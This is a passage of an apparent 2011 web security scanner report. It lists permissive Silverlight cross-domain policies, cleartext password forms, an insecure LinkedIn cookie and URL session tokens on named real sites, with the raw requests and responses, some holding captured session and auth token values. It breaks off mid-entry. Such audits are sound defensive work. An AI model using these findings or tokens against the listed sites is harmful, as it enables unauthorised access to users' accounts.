7.5. http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmcharlotte.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:25 GMT
Server: Omniture DC/2.0.0
xserver: www86
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:23:13 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 1293
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:52:32 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:52:32 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.9. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
xserver: www172
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://video.od.visiblemeasures.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: video.od.visiblemeasures.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 01:17:23 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Wed, 09 Mar 2011 01:34:37 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from>
               <domain uri="*" />
           </allow-from>
<grant-to>
<r
...[SNIP]...

7.11. http://www.goutsa.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goutsa.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.goutsa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:15 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

7.12. http://www.tulsaworld.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tulsaworld.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.tulsaworld.com

Response

HTTP/1.1 200 OK
Content-Length: 319
Content-Type: text/xml
Last-Modified: Fri, 26 Nov 2010 22:31:11 GMT
Accept-Ranges: bytes
ETag: "88a3a1a0b98dcb1:277"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:24 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

7.13. http://www.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:33 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

8. Cleartext submission of password
There are 8 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.2. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 04 Sep 2011 01:26:08 GMT
Date: Sun, 04 Sep 2011 01:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--

fsn - -->
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='net_loginblock'></td>
...[SNIP]...

8.3. http://www.ispsports.com/radio-network-affiliates.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ispsports.com
Path:   /radio-network-affiliates.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /radio-network-affiliates.cfm HTTP/1.1
Host: www.ispsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:26:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</h5>
       
       <form id="login" action="affiliate-employee-login.cfm" method="post">
           <div id="username">
...[SNIP]...
</label>
               <input id="password_field" type="password" name="password" title="Password" value="" tabindex="2" />
           </div>
...[SNIP]...

8.4. http://www.sacbee.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<br />

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()">

<input type="hidden" name="mode" value="register_done" />
...[SNIP]...
<td><input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value=""></td>
...[SNIP]...
<td><input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value=""></td>
...[SNIP]...

8.5. http://www.sacbee.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
</h3>
<form id="LoginForm" name="LoginForm" action="/reg-bin/int.cgi" method="post">
<input type="hidden" name="mode" value="login_done" />
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" size="25" class="miregtext">
<input type="image" id="signin-button" src="/static/images/signin-button.png" value="Sign In" />
...[SNIP]...

8.6. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
</h3>
<form name="LoginForm" action="/reg-bin/int.cgi" method=post>
<input type="hidden" name="mode" value="login_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregtext" value="">
<p class="form-notif">
...[SNIP]...

8.7. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
</script>

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()" id="registration">
<input type="hidden" name="mode" value="register_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value="">
</div>
...[SNIP]...
</label>
<input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value="">
</div>
...[SNIP]...

8.8. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
<div class="login-form">
<form method="post" action="/reg-bin/int.cgi">
<input type="hidden" value="login_done" name="mode"/>
...[SNIP]...
</label>
<input type="password" class="text" name="password" />
<!-- /.form_input -->
...[SNIP]...

9. SSL cookie without secure flag set

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:26:19 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

10. Session token in URL
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://charlotteobserver.adperfect.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://charlotteobserver.adperfect.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: charlotteobserver.adperfect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:16 GMT
Server: Apache
MIME-Version: 1.0
Content-Length: 15034
Vary: Accept-Encoding
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       
           <title>O
...[SNIP]...
<span class="ap_loginForm_forgotPass"><a href="password.html?-session=ComboAd:32177B6A160c72C7C8SLM4124B7B" class="sm">Forgot Password?</a>
...[SNIP]...
</span><a href="http://charlotteobserver.adperfect.com/default.html?pubid=none&-session=ComboAd:32177B6A160c72C7C8SLM4124B7B">Home</a>
...[SNIP]...

10.2. http://control.adap.tv/control

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A07%3A39";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:07:39 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32443

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...

10.3. http://feedburner.google.com/fb/a/mailverify

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://feedburner.google.com
Path:   /fb/a/mailverify

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:27 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=gkFJwX2XgYEBqqOKgqr6OA; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Sun, 04 Sep 2011 01:22:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...
<h1><a href="/fb/a/home?gsessionid=xLQwG_KvXxSf9t9O8zC_nw">FeedBurner</a>
...[SNIP]...
<div id="footer">
&copy;2004&ndash;2011
Google
(<a href="http://feedburner.google.com/fb/a/tos?gsessionid=xLQwG_KvXxSf9t9O8zC_nw">Terms of Service</a>
...[SNIP]...

10.4. http://log.adap.tv/log

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://log.adap.tv
Path:   /log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /log?event=crossViewFilter&rs=p&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=1&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Content-Length: 0


10.5. http://qlog.adap.tv/log

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://qlog.adap.tv
Path:   /log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

